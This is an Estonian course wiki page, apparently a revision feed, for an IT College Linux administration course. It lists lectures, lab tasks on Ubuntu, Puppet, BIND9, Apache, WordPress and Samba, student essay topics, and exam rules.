Operatsioonisüsteemide administreerimine ja sidumine (Rangelt soovituslik). Osadmin aines loetava oskamine on antud aine õppimise eelduseks. ÕISis on see eeldus märgitud soovituslikuks, kuna igal aastal on paar inimest, kes suudavad mõlemad ained korraga läbida ja on antud vallas väga pädevad.&lt;br /&gt;
Linuxi administraatori kursus on mõeldud tugeva infotehnoloogilise põhjaga arvuti-spetsialistile.&lt;br /&gt;
Kursuse rõhk on eelkõige võrguhalduril, kelle tööülesannete hulka kuulub igapäevane serverite, võrgu jms hooldus, konfigureerimine ja uute seadmete installatsioon.&lt;br /&gt;
&lt;br /&gt;
=Eesmärk ja sisu=&lt;br /&gt;
&lt;br /&gt;
Kursuse esimeses osas õpitakse tundma Linux süsteemi toimimist, antakse ülevaade administreerimistoimingute automatiseerimisest shelli skriptide abil ja omandatakse praktiline käsufailide koostamise kogemus.&lt;br /&gt;
&lt;br /&gt;
Teises osas õpitakse paigaldama ja konfigureerima erinevaid võrguteenuseid. Kursuse teise osa alguses korratakse taseme ühtlustamiseks TCP/IP võrgu põhialuseid.&lt;br /&gt;
&lt;br /&gt;
=Õpiväljundid=&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Loengud=&lt;br /&gt;
&lt;br /&gt;
Kaugõppe loengute ja praktikumide videosalvestused:&lt;br /&gt;
http://echo360.e-ope.ee/ess/portal/section/4bd0abde-1b0d-4c92-a35e-0f99a81f069d&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
1. Sissejuhatav loeng eeldustest [http://enos.itcollege.ee/~mernits/Linux%20administreerimine/loeng01%20-%20Sissejuhatus%20ainesse%20Linux%20administreerimine%20-%202013%20.pdf Sissejuhatus Loeng 1]&lt;br /&gt;
&lt;br /&gt;
2. Kordamine Osadmin [http://elab.itcollege.ee:8000/Linux-Basics.mm]&lt;br /&gt;
&lt;br /&gt;
3. Linux süsteemi põhilised komponendid [http://enos.itcollege.ee/~mernits/Linux%20administreerimine/loeng02%20-%20Linux%20s%c3%bcsteemide%20haldamine%20-%202013%20.pdf Linux haldamine Loeng 2]&lt;br /&gt;
&lt;br /&gt;
4. Linux süsteemi haldamine puppet abil [http://enos.itcollege.ee/~mernits/Linux%20administreerimine/loeng03%20-%20Linux%20s%c3%bcsteemide%20haldamine%20-%202013%20.pdf Linux haldamine Loeng 3]&lt;br /&gt;
&lt;br /&gt;
5. Linux süsteemi haldamine puppet abil [http://enos.itcollege.ee/~mernits/Linux%20administreerimine/loeng04%20-%20Linux%20s%c3%bcsteemide%20haldamine%20II%20-%202013%20.pdf Linux haldamine Loeng 4]&lt;br /&gt;
&lt;br /&gt;
Puppeti teise loengu video: http://elab.itcollege.ee:8000/linux-admin/pupppet-algus.ogv&lt;br /&gt;
&lt;br /&gt;
=Praktikumid=&lt;br /&gt;
&lt;br /&gt;
==Esimene praktikum - Ubuntu Serveri ja kliendi paigaldamine ning kordamine==&lt;br /&gt;
* Paigaldage &#039;&#039;&#039;Ubuntu Linux Server&#039;&#039;&#039; süsteem VirtualBox abil&lt;br /&gt;
**RAM 512MB&lt;br /&gt;
**HDD dynamicly allocated 8GB&lt;br /&gt;
**2 Võrgukaarti NIC1 - NAT (eth0 - Ubuntus) ja NIC2 - HostOnly (eth1 - Ubuntus)&lt;br /&gt;
**Logige serverisse sisse ja seadistage võrk failis /etc/network/interfaces (liidese eth1 ip aadress 192.168.56.200). &lt;br /&gt;
***Abiinfo [[Ubuntu server võrgu seadistamine]] ja [[VirtualBoxi võrgud]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
auto eth1&lt;br /&gt;
iface eth1 inet static&lt;br /&gt;
  address 192.168.56.200&lt;br /&gt;
  netmask 255.255.255.0&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
*Paigaldage openssh server, kui te seda installi käigus ei teinud (apt-get update &amp;amp;&amp;amp; apt-get install ssh)&lt;br /&gt;
&lt;br /&gt;
Ubuntu Server 12.04.1 LTS ISO (64bit) http://elab.itcollege.ee:8000/ubuntu-12.04.1-server-amd64.iso&lt;br /&gt;
&lt;br /&gt;
Eelduste kontrollimise test harjutamiseks: http://goo.gl/73xBZ&lt;br /&gt;
Kes tunneb, et test on &#039;&#039;&#039;liiga keeruline&#039;&#039;&#039;, peab &#039;&#039;&#039;kaaluma&#039;&#039;&#039; aine deklareerimise asemel &#039;&#039;&#039;Osadmin aine (mis on soovituslik eeldus) läbimist&#039;&#039;&#039;.&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Ubuntu Desktop Linux&#039;&#039;&#039; paigaldamine (Võib paigaldada ka mõne muu disrtibutsiooni desktop masina, kuna seda läheb meil niikuinii hiljem vaja)&lt;br /&gt;
**Memory 1024MB&lt;br /&gt;
**HDD 16GB (või 8GB) Dynamic disk&lt;br /&gt;
**Network&lt;br /&gt;
**Video Memory 64MB 3D acceleration sisse&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;NB! Kasutamiseks valmis masinad: [http://elab.itcollege.ee:8000/ubuntu-server-64.ova server 64bit] ja [http://elab.itcollege.ee:8000/ubuntu-desktop-64.ova klient 64bit], [http://elab.itcollege.ee:8000/UbuntuServer32bit.ova server 32bit] ja [http://elab.itcollege.ee:8000/UbuntuDesktop32bit.ova klient 32bit]&#039;&#039;&#039; &lt;br /&gt;
&lt;br /&gt;
Pärast paigaldamist seadistada [https://wiki.itcollege.ee/index.php/OpenSSH:_v%C3%B5tmetega_autentimine key based autentimisega] serverisse sisenemine. (tööjaamast saab serveris käske käivitada)&lt;br /&gt;
&lt;br /&gt;
==Teine ja kolmas praktikum - Eeldustetest ja kordamine==&lt;br /&gt;
&lt;br /&gt;
Kordamiseks leiate vajalikku infot [https://wiki.itcollege.ee/index.php/Category:Operatsioonis%C3%BCsteemide_administreerimine_ja_sidumine Operatsioonisüsteemide administreerimise ja sidumise] aine vikist. &lt;br /&gt;
&lt;br /&gt;
[http://goo.gl/AFGfoV Eeldustetest 1]&lt;br /&gt;
&lt;br /&gt;
[http://goo.gl/F0PiWK Eeldustetest 2]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Linux keskhaldus puppet baasil==&lt;br /&gt;
&lt;br /&gt;
Praktikumis paigaldame puppet serveri (master) ja kliendi.&lt;br /&gt;
&lt;br /&gt;
Näiteülesanded kaitsmiseks&lt;br /&gt;
&lt;br /&gt;
1. Loo puppet abil fail /etc/issue sisuga KALA&lt;br /&gt;
&lt;br /&gt;
2. Loo puppet abil kasutaja polekala, kodukaustaga /home/polekala, shelliga /bin/zsh ( tee ka paki zsh paigaldus)&lt;br /&gt;
&lt;br /&gt;
3. Lisa nodele class tarkvara, mis paigaldab htop, bpython pakid&lt;br /&gt;
&lt;br /&gt;
4. Loo nodele class eemalda, mis eemaldab paki cowsay&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
5. Viimane ülesanne on igal ühel erinev.&lt;br /&gt;
&lt;br /&gt;
5.1 Loo serverisse kasutaja kala ja tee talle ssh key. Seadista kliendiarvuti selliselt, et paigaldataks pakk ssh ja lisataks root kasutajale kliendis loodud ssh public key.&lt;br /&gt;
&lt;br /&gt;
5.2 Paigalda kliendi arvutisse ntp server ja määra ntp serveriteks ntp.eenet.ee ja ntp.ut.ee&lt;br /&gt;
&lt;br /&gt;
5.3 Lisa kliendi arvutisse apache2 veebiserver koos virtualhostiga www.planet.zz, (failis /var/www/www.planet.zz/index.html on rida www.planet.zz)&lt;br /&gt;
Apache konfis peab olema ServerName www.planet.zz ja sites-enabled all sait www.planet.zz&lt;br /&gt;
&lt;br /&gt;
5.4 Lisa kliendi arvutisse bind9 nimeserver (normaalselt tööjaama seda ei tehta, kuid antud näitel on meil vaid üks konfigureeritav host). Seadista enda valitud domeeniminega tsoon koos revers tsooniga. Lisa kirjed www.sinudomeen.zz, mail.sinudomeen.zz, puppet.sinudomeen.zz koos PTR kirjetega.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Puppet Examples]]&lt;br /&gt;
&lt;br /&gt;
==Keskne logiserver==&lt;br /&gt;
Labor 2 üheks võimalikuks teemaks on keskse logihalduse lahenduse loomine&lt;br /&gt;
&lt;br /&gt;
[[Keskse logilahenduse rakendamine]]&lt;br /&gt;
&lt;br /&gt;
[http://enos.itcollege.ee/~mernits/Linux%20administreerimine/Arnus%20-%20keskne%20logilahendus.pdf  Lõputöö logihalduse teemal]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
http://rdstash.blogspot.com/2013/01/installing-logstash-as-syslog-server-on.html&lt;br /&gt;
&lt;br /&gt;
=Esseede teemad 2012=&lt;br /&gt;
&lt;br /&gt;
Võib valida keerulisemaid teemasid ka [[Osadmin referaadi teemad]] lehelt.&lt;br /&gt;
&lt;br /&gt;
[[zsh]] - pole algajale&lt;br /&gt;
&lt;br /&gt;
Mida uurida &lt;br /&gt;
&lt;br /&gt;
Prompt&lt;br /&gt;
&lt;br /&gt;
http://zshwiki.org/home/config/prompt&lt;br /&gt;
&lt;br /&gt;
http://stevelosh.com/blog/2010/02/my-extravagant-zsh-prompt/&lt;br /&gt;
&lt;br /&gt;
.zshrc&lt;br /&gt;
&lt;br /&gt;
for &lt;br /&gt;
&lt;br /&gt;
if &lt;br /&gt;
&lt;br /&gt;
while &lt;br /&gt;
&lt;br /&gt;
jne&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[exFAT vs Linux]] - Kalju Hõbemäe&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[CentOS Server]] --- teeb Oliver Naaris&lt;br /&gt;
&lt;br /&gt;
Paigaldamine&lt;br /&gt;
&lt;br /&gt;
Teenuste DNS, apache2, samba, e-post seadistamine&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Superb Mini Server]] --- Mark-Erik Mogom, Andrus Dei &lt;br /&gt;
&lt;br /&gt;
Paigaldamine&lt;br /&gt;
&lt;br /&gt;
DNS, samba, LDAP, e-post seadistamine&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Oracle Linux]]&lt;br /&gt;
&lt;br /&gt;
Paigaldamine&lt;br /&gt;
&lt;br /&gt;
Teenuste DNS, apache2, samba, e-post seadistamine&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Suse Linux]]&lt;br /&gt;
&lt;br /&gt;
Paigaldamine&lt;br /&gt;
&lt;br /&gt;
Teenuste DNS, apache2, samba seadistamine&lt;br /&gt;
&lt;br /&gt;
[[OpenLDAP Ubuntu Serveril]] - Tarmo Suurmägi, Taavi Sannik, Harri Uljas&lt;br /&gt;
&lt;br /&gt;
[[Zentyal SAMBA4]] --- Lang &amp;amp; Lihten A31&lt;br /&gt;
&lt;br /&gt;
Samba4 domeenikontrolleri seadistamine ja ubuntu/fedora/muu süsteem autentimise seadistamine kasutades uusi vahendeid&lt;br /&gt;
&lt;br /&gt;
[[Apt-yum/dpkg-rpm käskude lühivõrdlus]] - Teet Saar A32&lt;br /&gt;
&lt;br /&gt;
[[Ophcrack]] - teeb Kristo Kapten&lt;br /&gt;
&lt;br /&gt;
[[rancid]] - Meelis Kurnikov, Aive Haavel AK31&lt;br /&gt;
&lt;br /&gt;
[[zenoss]] - Kristjan Vaik&lt;br /&gt;
&lt;br /&gt;
[[Apache autentimine LDAP&#039;iga]] - Rauno Lehiste&lt;br /&gt;
=Esseede teemad 2013=&lt;br /&gt;
[[Owncloud]] - Tõnu Erm AK31&lt;br /&gt;
&lt;br /&gt;
[[Linuxi administreerimine - Labor 2 (keskse logihalduse rakendamine) protokoll]] - Sten Aus 28.11.2013&lt;br /&gt;
&lt;br /&gt;
=Eksamist=&lt;br /&gt;
&lt;br /&gt;
Tee ära labor 2 (oma valitud teemal + selle kohta wiki kirjatöö)&lt;br /&gt;
Eksamil ole valmis demoma labor 1 raames kaitstud asju.&lt;br /&gt;
&lt;br /&gt;
Kirjatööd sisu tuleb eksamil kaitsta vestluse vormis.&lt;br /&gt;
&lt;br /&gt;
Eksami käigus saab kaitsta ka labor 1 ja 2 asju.&lt;br /&gt;
&lt;br /&gt;
Eksami käigus tõmbad loosi, mida labor 1 raames parandada. Õppejõud teeb teenuse katki ja tudeng teeb korda. (soovitatav on eelnevalt teha  teenusest varukoopia).&lt;br /&gt;
&lt;br /&gt;
Punkte saab selgituse eest, mis oli katki ja kuidas tegid korda.&lt;br /&gt;
&lt;br /&gt;
Katki tegemisel võib arvestada näiteks, et algaja admin (õppejõud:) muutis ära parooli, rikkus võrguseaded ja kustutas täiesti süüdimatult mõne konfifaili.&lt;br /&gt;
&lt;br /&gt;
=Laborimaterjalid 2012=&lt;br /&gt;
&lt;br /&gt;
Teha apt -  yum ja dpkg - rpm vastavustabel. dpkg ja apt korraldused leiab [http://elab.itcollege.ee:8000/Linux-Basics.mm Linux-Basics mindmapist]&lt;br /&gt;
&lt;br /&gt;
Parim töö annab 7p, järgmised 5p (piisavalt põhjalikud ja erinevad)&lt;br /&gt;
&lt;br /&gt;
Ebapiisavad vastavustabelid, mis sarnanevad üksteisele punkte ei saa.&lt;br /&gt;
&lt;br /&gt;
Kui su tabel on ilma vigadeta, kuid mitte parimate sead siis saad 1-2p.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Praks 4&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Nimeserveri BIND9 paigaldamine.&lt;br /&gt;
&lt;br /&gt;
*Mõtle välja domeenimini&lt;br /&gt;
*Paigalda nimeserver bind9&lt;br /&gt;
*Seadista oma domeen&lt;br /&gt;
**www.domeen&lt;br /&gt;
**ns.domeen&lt;br /&gt;
**sales.domeen&lt;br /&gt;
**seadista oma kliendimasin kasutama uut nimeserverit&lt;br /&gt;
&lt;br /&gt;
NB: enne kaitsmist lugeda läbi http://kuutorvaja.eenet.ee/wiki/DNS&lt;br /&gt;
&lt;br /&gt;
Labori üks näide [[Nimeserveri seadistamine BIND9 näitel]]&lt;br /&gt;
&lt;br /&gt;
Praktikumi salvestus http://echo360.e-uni.ee/ess/echo/presentation/a828b6af-8caf-4319-b594-5d6bfed04a70&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Punktide&#039;&#039;&#039; (5p) &#039;&#039;&#039;kirja saamiseks&#039;&#039;&#039; peab töötama nii nimede lahendamine läbi teie nimeserveri kui ka reverse lookup.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Praks 5&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Veebiserveri apache2 paigaldamine&lt;br /&gt;
&lt;br /&gt;
*Loo veebisaidid www.domeen ja sales.domeen (ehk oma DNS labori nimedele vastavad veebisaidid)&lt;br /&gt;
Praktikumi salvestus: http://echo360.e-uni.ee/ess/echo/presentation/0945a764-0305-48ec-8082-4e57a23cc536&lt;br /&gt;
*Seadist HTTPS nendele saitidele (vajadusel loo uus ip alias ja muuda nimeserveris olevat kirjet, et TLS nimed viitaks erinevatele IP aadressidele)&lt;br /&gt;
*Abiks on loeng: http://enos.itcollege.ee/~mernits/infrastruktuur/loeng04%20-%20Veebiserver.odp ja labor: https://wiki.itcollege.ee/index.php/Veebiserveri_labor_v.2&lt;br /&gt;
*Paigalda WordPress vastavalt juhendile: http://goo.gl/6XQ0U&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Punktide&#039;&#039;&#039; (5p) &#039;&#039;&#039;kirja saamiseks&#039;&#039;&#039; peab töötama veebiserververi apache2 pealt 2 veebilehte ning wordpress. Wordpressile peab olema paigaldatud super cache ning lisaks peab töötama varnish. Seejuures wordpress on seadistatud pordile 80 ja wordpress pordil 8080. Lehe toimivust testige enne kaitsmist ab vahendiga, kus -n 1000 ja -t 10.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Praks 7&#039;&#039;&#039;&lt;br /&gt;
Samba share-i välja jagamine. &lt;br /&gt;
&lt;br /&gt;
*Loo share, mis on ligipääsetav vaid kasutajatele, kes kuuluvad lab gruppi. Vajalik on ka share-ile kirjutamisõigus (saab kausta luua). &lt;br /&gt;
* Seadista samba abil kasutajate kodukaustadele ligipääsemine. Iga kasutaja peab ligi pääsema enda kodukaustale. &lt;br /&gt;
&lt;br /&gt;
*Abiks on viki artiklid : https://wiki.itcollege.ee/index.php/Failiserver_Samba_labor_2 ja https://wiki.itcollege.ee/index.php/Lihtne_samba_install&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Punktide&#039;&#039;&#039; (5p) &#039;&#039;&#039;kirja saamiseks&#039;&#039;&#039; on vajalik share-i olemasolu, mis on ligipääsetav ning kirjutatav (võimalik luua kataloogi) ainult lab gruppi kuuluvatele kasutajatele ning lab gruppi mitte kuuluvad kasutajad ei tohi sinna ligi pääseda. &lt;br /&gt;
Lisaks peavad kasutajad pääsema ligi oma kodukaustale, sõltumata sellest, kas ta kuulub lab gruppi või mitte.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Labor 1&#039;&#039;&#039;&lt;br /&gt;
*Veebiserver ja virtualhostid&lt;br /&gt;
*DNS&lt;br /&gt;
*e-post&lt;br /&gt;
*iptables&lt;br /&gt;
*samba&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Labor 2&#039;&#039;&#039;&lt;br /&gt;
*LDAP või Samba4 - LDAP Teet Saar, Kullo-Kalev Aru&lt;br /&gt;
*Puppet või chef&lt;br /&gt;
*PAM&lt;br /&gt;
*Puppet (Ubuntus) - Kristo Kapten&lt;br /&gt;
*[[Samba(windows domeenis fileserver)]] - Marko Kurs&lt;br /&gt;
*[[TLS termineerimine nginx abil]] - Sander Arnus, Sander Saveli&lt;/div&gt;</summary>
		<author><name>Saus</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Linuxi_administreerimine&amp;diff=69523</id>
		<title>Linuxi administreerimine</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Linuxi_administreerimine&amp;diff=69523"/>
		<updated>2013-12-05T10:08:32Z</updated>

		<summary type="html">&lt;p&gt;Saus: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Üldinfo=&lt;br /&gt;
ECTS: 4&lt;br /&gt;
Hindamisviis: Eksam&lt;br /&gt;
&lt;br /&gt;
==Õppejõud==&lt;br /&gt;
Margus Ernits&lt;br /&gt;
&lt;br /&gt;
Katrin Loodus&lt;br /&gt;
&lt;br /&gt;
=Eeldused ja sihtgrupp=&lt;br /&gt;
&lt;br /&gt;
Operatsioonisüsteemide administreerimine ja sidumine (Rangelt soovituslik). Osadmin aines loetava oskamine on antud aine õppimise eelduseks. ÕISis on see eeldus märgitud soovituslikuks, kuna igal aastal on paar inimest, kes suudavad mõlemad ained korraga läbida ja on antud vallas väga pädevad.&lt;br /&gt;
Linuxi administraatori kursus on mõeldud tugeva infotehnoloogilise põhjaga arvuti-spetsialistile.&lt;br /&gt;
Kursuse rõhk on eelkõige võrguhalduril, kelle tööülesannete hulka kuulub igapäevane serverite, võrgu jms hooldus, konfigureerimine ja uute seadmete installatsioon.&lt;br /&gt;
&lt;br /&gt;
=Eesmärk ja sisu=&lt;br /&gt;
&lt;br /&gt;
Kursuse esimeses osas õpitakse tundma Linux süsteemi toimimist, antakse ülevaade administreerimistoimingute automatiseerimisest shelli skriptide abil ja omandatakse praktiline käsufailide koostamise kogemus.&lt;br /&gt;
&lt;br /&gt;
Teises osas õpitakse paigaldama ja konfigureerima erinevaid võrguteenuseid. Kursuse teise osa alguses korratakse taseme ühtlustamiseks TCP/IP võrgu põhialuseid.&lt;br /&gt;
&lt;br /&gt;
=Õpiväljundid=&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Loengud=&lt;br /&gt;
&lt;br /&gt;
Kaugõppe loengute ja praktikumide videosalvestused:&lt;br /&gt;
http://echo360.e-ope.ee/ess/portal/section/4bd0abde-1b0d-4c92-a35e-0f99a81f069d&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
1. Sissejuhatav loeng eeldustest [http://enos.itcollege.ee/~mernits/Linux%20administreerimine/loeng01%20-%20Sissejuhatus%20ainesse%20Linux%20administreerimine%20-%202013%20.pdf Sissejuhatus Loeng 1]&lt;br /&gt;
&lt;br /&gt;
2. Kordamine Osadmin [http://elab.itcollege.ee:8000/Linux-Basics.mm]&lt;br /&gt;
&lt;br /&gt;
3. Linux süsteemi põhilised komponendid [http://enos.itcollege.ee/~mernits/Linux%20administreerimine/loeng02%20-%20Linux%20s%c3%bcsteemide%20haldamine%20-%202013%20.pdf Linux haldamine Loeng 2]&lt;br /&gt;
&lt;br /&gt;
4. Linux süsteemi haldamine puppet abil [http://enos.itcollege.ee/~mernits/Linux%20administreerimine/loeng03%20-%20Linux%20s%c3%bcsteemide%20haldamine%20-%202013%20.pdf Linux haldamine Loeng 3]&lt;br /&gt;
&lt;br /&gt;
5. Linux süsteemi haldamine puppet abil [http://enos.itcollege.ee/~mernits/Linux%20administreerimine/loeng04%20-%20Linux%20s%c3%bcsteemide%20haldamine%20II%20-%202013%20.pdf Linux haldamine Loeng 4]&lt;br /&gt;
&lt;br /&gt;
Puppeti teise loengu video: http://elab.itcollege.ee:8000/linux-admin/pupppet-algus.ogv&lt;br /&gt;
&lt;br /&gt;
=Praktikumid=&lt;br /&gt;
&lt;br /&gt;
==Esimene praktikum - Ubuntu Serveri ja kliendi paigaldamine ning kordamine==&lt;br /&gt;
* Paigaldage &#039;&#039;&#039;Ubuntu Linux Server&#039;&#039;&#039; süsteem VirtualBox abil&lt;br /&gt;
**RAM 512MB&lt;br /&gt;
**HDD dynamicly allocated 8GB&lt;br /&gt;
**2 Võrgukaarti NIC1 - NAT (eth0 - Ubuntus) ja NIC2 - HostOnly (eth1 - Ubuntus)&lt;br /&gt;
**Logige serverisse sisse ja seadistage võrk failis /etc/network/interfaces (liidese eth1 ip aadress 192.168.56.200). &lt;br /&gt;
***Abiinfo [[Ubuntu server võrgu seadistamine]] ja [[VirtualBoxi võrgud]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
auto eth1&lt;br /&gt;
iface eth1 inet static&lt;br /&gt;
  address 192.168.56.200&lt;br /&gt;
  netmask 255.255.255.0&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
*Paigaldage openssh server, kui te seda installi käigus ei teinud (apt-get update &amp;amp;&amp;amp; apt-get install ssh)&lt;br /&gt;
&lt;br /&gt;
Ubuntu Server 12.04.1 LTS ISO (64bit) http://elab.itcollege.ee:8000/ubuntu-12.04.1-server-amd64.iso&lt;br /&gt;
&lt;br /&gt;
Eelduste kontrollimise test harjutamiseks: http://goo.gl/73xBZ&lt;br /&gt;
Kes tunneb, et test on &#039;&#039;&#039;liiga keeruline&#039;&#039;&#039;, peab &#039;&#039;&#039;kaaluma&#039;&#039;&#039; aine deklareerimise asemel &#039;&#039;&#039;Osadmin aine (mis on soovituslik eeldus) läbimist&#039;&#039;&#039;.&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Ubuntu Desktop Linux&#039;&#039;&#039; paigaldamine (Võib paigaldada ka mõne muu disrtibutsiooni desktop masina, kuna seda läheb meil niikuinii hiljem vaja)&lt;br /&gt;
**Memory 1024MB&lt;br /&gt;
**HDD 16GB (või 8GB) Dynamic disk&lt;br /&gt;
**Network&lt;br /&gt;
**Video Memory 64MB 3D acceleration sisse&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;NB! Kasutamiseks valmis masinad: [http://elab.itcollege.ee:8000/ubuntu-server-64.ova server 64bit] ja [http://elab.itcollege.ee:8000/ubuntu-desktop-64.ova klient 64bit], [http://elab.itcollege.ee:8000/UbuntuServer32bit.ova server 32bit] ja [http://elab.itcollege.ee:8000/UbuntuDesktop32bit.ova klient 32bit]&#039;&#039;&#039; &lt;br /&gt;
&lt;br /&gt;
Pärast paigaldamist seadistada [https://wiki.itcollege.ee/index.php/OpenSSH:_v%C3%B5tmetega_autentimine key based autentimisega] serverisse sisenemine. (tööjaamast saab serveris käske käivitada)&lt;br /&gt;
&lt;br /&gt;
==Teine ja kolmas praktikum - Eeldustetest ja kordamine==&lt;br /&gt;
&lt;br /&gt;
Kordamiseks leiate vajalikku infot [https://wiki.itcollege.ee/index.php/Category:Operatsioonis%C3%BCsteemide_administreerimine_ja_sidumine Operatsioonisüsteemide administreerimise ja sidumise] aine vikist. &lt;br /&gt;
&lt;br /&gt;
[http://goo.gl/AFGfoV Eeldustetest 1]&lt;br /&gt;
&lt;br /&gt;
[http://goo.gl/F0PiWK Eeldustetest 2]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Linux keskhaldus puppet baasil==&lt;br /&gt;
&lt;br /&gt;
Praktikumis paigaldame puppet serveri (master) ja kliendi.&lt;br /&gt;
&lt;br /&gt;
Näiteülesanded kaitsmiseks&lt;br /&gt;
&lt;br /&gt;
1. Loo puppet abil fail /etc/issue sisuga KALA&lt;br /&gt;
&lt;br /&gt;
2. Loo puppet abil kasutaja polekala, kodukaustaga /home/polekala, shelliga /bin/zsh ( tee ka paki zsh paigaldus)&lt;br /&gt;
&lt;br /&gt;
3. Lisa nodele class tarkvara, mis paigaldab htop, bpython pakid&lt;br /&gt;
&lt;br /&gt;
4. Loo nodele class eemalda, mis eemaldab paki cowsay&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
5. Viimane ülesanne on igal ühel erinev.&lt;br /&gt;
&lt;br /&gt;
5.1 Loo serverisse kasutaja kala ja tee talle ssh key. Seadista kliendiarvuti selliselt, et paigaldataks pakk ssh ja lisataks root kasutajale kliendis loodud ssh public key.&lt;br /&gt;
&lt;br /&gt;
5.2 Paigalda kliendi arvutisse ntp server ja määra ntp serveriteks ntp.eenet.ee ja ntp.ut.ee&lt;br /&gt;
&lt;br /&gt;
5.3 Lisa kliendi arvutisse apache2 veebiserver koos virtualhostiga www.planet.zz, (failis /var/www/www.planet.zz/index.html on rida www.planet.zz)&lt;br /&gt;
Apache konfis peab olema ServerName www.planet.zz ja sites-enabled all sait www.planet.zz&lt;br /&gt;
&lt;br /&gt;
5.4 Lisa kliendi arvutisse bind9 nimeserver (normaalselt tööjaama seda ei tehta, kuid antud näitel on meil vaid üks konfigureeritav host). Seadista enda valitud domeeniminega tsoon koos revers tsooniga. Lisa kirjed www.sinudomeen.zz, mail.sinudomeen.zz, puppet.sinudomeen.zz koos PTR kirjetega.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Puppet Examples]]&lt;br /&gt;
&lt;br /&gt;
==Keskne logiserver==&lt;br /&gt;
Labor 2 üheks võimalikuks teemaks on keskse logihalduse lahenduse loomine&lt;br /&gt;
&lt;br /&gt;
[[Keskse logilahenduse rakendamine]]&lt;br /&gt;
&lt;br /&gt;
[http://enos.itcollege.ee/~mernits/Linux%20administreerimine/Arnus%20-%20keskne%20logilahendus.pdf  Lõputöö logihalduse teemal]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
http://rdstash.blogspot.com/2013/01/installing-logstash-as-syslog-server-on.html&lt;br /&gt;
&lt;br /&gt;
=Esseede teemad 2012=&lt;br /&gt;
&lt;br /&gt;
Võib valida keerulisemaid teemasid ka [[Osadmin referaadi teemad]] lehelt.&lt;br /&gt;
&lt;br /&gt;
[[zsh]] - pole algajale&lt;br /&gt;
&lt;br /&gt;
Mida uurida &lt;br /&gt;
&lt;br /&gt;
Prompt&lt;br /&gt;
&lt;br /&gt;
http://zshwiki.org/home/config/prompt&lt;br /&gt;
&lt;br /&gt;
http://stevelosh.com/blog/2010/02/my-extravagant-zsh-prompt/&lt;br /&gt;
&lt;br /&gt;
.zshrc&lt;br /&gt;
&lt;br /&gt;
for &lt;br /&gt;
&lt;br /&gt;
if &lt;br /&gt;
&lt;br /&gt;
while &lt;br /&gt;
&lt;br /&gt;
jne&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[exFAT vs Linux]] - Kalju Hõbemäe&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[CentOS Server]] --- teeb Oliver Naaris&lt;br /&gt;
&lt;br /&gt;
Paigaldamine&lt;br /&gt;
&lt;br /&gt;
Teenuste DNS, apache2, samba, e-post seadistamine&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Superb Mini Server]] --- Mark-Erik Mogom, Andrus Dei &lt;br /&gt;
&lt;br /&gt;
Paigaldamine&lt;br /&gt;
&lt;br /&gt;
DNS, samba, LDAP, e-post seadistamine&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Oracle Linux]]&lt;br /&gt;
&lt;br /&gt;
Paigaldamine&lt;br /&gt;
&lt;br /&gt;
Teenuste DNS, apache2, samba, e-post seadistamine&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Suse Linux]]&lt;br /&gt;
&lt;br /&gt;
Paigaldamine&lt;br /&gt;
&lt;br /&gt;
Teenuste DNS, apache2, samba seadistamine&lt;br /&gt;
&lt;br /&gt;
[[OpenLDAP Ubuntu Serveril]] - Tarmo Suurmägi, Taavi Sannik, Harri Uljas&lt;br /&gt;
&lt;br /&gt;
[[Zentyal SAMBA4]] --- Lang &amp;amp; Lihten A31&lt;br /&gt;
&lt;br /&gt;
